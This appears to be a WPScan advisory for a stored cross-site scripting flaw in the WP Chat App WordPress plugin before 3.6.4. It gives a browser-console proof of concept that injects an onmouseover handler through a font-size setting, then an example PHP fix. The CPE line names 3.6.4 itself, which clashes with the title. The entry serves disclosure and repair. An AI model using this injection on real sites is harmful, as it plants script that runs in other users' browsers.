wpvulndb | Dmitrii Ignatyev | WPVDB-ID: 91058C48-F262-4FCC-9390-472D59D61115
History: Apr 05, 2024 - 12:00 a.m.

WP Chat App < 3.6.4 - Admin+ Stored XSS

2024-04-05 00:00:00
Dmitrii Ignatyev
wpscan.com
5
Tags: wordpress, chat app, stored xss, unsanitised settings, admin, cross-site scripting, security vulnerability, update

AI Score: 5.7 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.0%)

Description: The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.

PoC

1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget

2. Paste and run the following in your browser's console (the body is a template literal so that the page's nonce is interpolated):

    await fetch("/wp-admin/admin-ajax.php", {
      "credentials": "include",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
      },
      "body": `title=Start+a+Conversation&isShowBtnLabel=on&btnLabel=Need+Help%3F+%3Cstrong%3EChat+with+us%3C%2Fstrong%3E&btnLabelWidth=156&textColor=%23fff&titleSize=titleSize=18"//'+onmouseover=alert(123)//&descriptionTextSize=12&accountNameSize=14&regularTextSize=11&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30&isShowPoweredBy=on&scrollHeight=500&responseText=The+team+typically+replies+in+a+few+minutes.&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage&action=njt_wa_save_design_setting&nonce=${njt_wa['nonce']}`,
      "method": "POST",
      "mode": "cors"
    });

3. Refresh the page, navigate to the "Design" tab and hover your mouse over Widget Font Size -> Title.
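The fix the description points at is sanitise-on-input plus escape-on-output for the design settings. The handler below is an added illustrative example written for this entry, not the plugin's own code: it reuses the action name and setting keys visible in the PoC request, while the option name, nonce action, hook wiring and output markup are assumptions.

```php
<?php
// Added illustrative example, not the plugin's own code. The option name, nonce
// action, hook wiring and output markup are assumptions; setting names mirror the PoC.

add_action( 'wp_ajax_njt_wa_save_design_setting', 'example_save_design_setting' );

function example_save_design_setting() {
    // Verify the nonce and require an administrator capability before saving anything.
    check_ajax_referer( 'example_design_nonce', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $in = wp_unslash( $_POST );

    // Sanitise on input: coerce each setting to the type it is meant to be, so a
    // font size such as titleSize can never carry a quote or an event handler.
    $settings = array(
        'title'           => sanitize_text_field( $in['title'] ?? '' ),
        'titleSize'       => absint( $in['titleSize'] ?? 18 ),
        'textColor'       => sanitize_hex_color( $in['textColor'] ?? '' ) ?: '#ffffff',
        'backgroundColor' => sanitize_hex_color( $in['backgroundColor'] ?? '' ) ?: '#2db742',
        'btnPosition'     => in_array( $in['btnPosition'] ?? '', array( 'left', 'right' ), true )
            ? $in['btnPosition'] : 'right',
        // Labels may carry limited markup (the PoC request sends <strong>), so pass them
        // through wp_kses_post instead of relying on the unfiltered_html capability.
        'btnLabel'        => wp_kses_post( $in['btnLabel'] ?? '' ),
        'description'     => wp_kses_post( $in['description'] ?? '' ),
    );

    update_option( 'example_wa_design_settings', $settings );
    wp_send_json_success( $settings );
}

// Escape on output as well: attribute and text contexts get esc_attr()/esc_html(), so
// a stale or migrated option value cannot break out of the markup either.
function example_render_title( array $settings ) {
    return sprintf(
        '<span class="example-title" style="font-size:%dpx;color:%s">%s</span>',
        absint( $settings['titleSize'] ?? 18 ),
        esc_attr( $settings['textColor'] ?? '#ffffff' ),
        esc_html( $settings['title'] ?? '' )
    );
}
```

With this in place the PoC's titleSize value is reduced to the integer 18 before it is stored, and the rendered title never reaches the browser unescaped.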

CPE Name    Operator    Version
            eq          3.6.4

